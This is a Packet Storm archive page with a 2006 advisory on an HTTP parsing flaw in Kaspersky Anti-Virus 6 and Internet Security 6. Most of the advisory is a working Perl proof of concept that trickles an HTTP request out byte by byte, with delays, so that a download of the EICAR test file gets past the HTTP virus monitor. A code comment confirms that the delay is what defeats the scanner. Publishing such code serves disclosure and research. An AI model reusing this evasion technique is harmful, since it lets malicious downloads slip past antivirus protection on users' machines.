what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Kaspersky6-http.txt

Kaspersky6-http.txt
Posted May 26, 2006
Authored by john

Kaspersky antivirus 6 and Kaspersky internet security 6 suffer from a vulnerability due to HTTP parsing errors in the HTTP monitor that could allow malicious software on the local computer to bypass the HTTP virus monitor.

tags | exploit, web, local, virus
SHA-256 | 268c19c0cb19f78740cd72d2a95993b7c5094298ce1e62a50f86ff0573425201

Kaspersky6-http.txt

Change Mirror Download
Kaspersky antivirus 6
Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:
The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).
Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:
There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;
use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',
'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,
PeerPort => $h_port,
Proto => 'tcp' );
die "socket: $!" unless $s;

sendthem( $s,
"GET $h_url HTTP/1.1",
"Host: $h_srv",
""
);
my $doc = read_body( $s, read_headers( $s ) );
syswrite STDOUT,
'document is <'.$doc.'> len='.length($doc)."\n";

sub sendthem {
my $s = shift;
my $c = 0;
foreach( @_ ) {
my @a = split //, $_;
++$c;
syswrite STDOUT, "query $c: ";
foreach( @a ) {
sendone( $s, $_ );
}
sendone( $s, "\r" );
sendone( $s, "\n" );
}
}

sub sendone {
my( $s, $v ) = @_;
$s->syswrite( $v );
syswrite STDOUT, $v;
# !!! comment next line to have monitoring working ;)
select( undef, undef, undef, 0.300 );
}

sub read_headers {
my( $s ) = @_;
my( $c, $cl ) = ( 0, 0 );
for( ;; ) {
my $l = read_line( $s );
++$c;
syswrite STDOUT, "header $c: $l";
syswrite STDOUT, "\r\n";
last if not $l and $c;
$cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;
}
$cl;
}

sub read_line {
my( $s ) = @_;
my $str = '';
for( ;; ) {
my $v = '';
my $r = $s->sysread( $v, 1 );
die 'EOF reading headers!' unless $r;
last if $v eq "\n";
next if $v eq "\r";
$str .= $v;
}
return $str;
}

sub read_body {
my( $s, $cl ) = @_;
my( $str, $cli ) = ( '', $cl );
syswrite STDOUT, "reading body <content-length: $cli> ...\n";
for( ;; ) {
my $v = '';
my $r = $s->sysread( $v, 1 );
last unless $r;
$str .= $v;
--$cl if $cli;
last if not $cl and $cli;
}
return $str;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close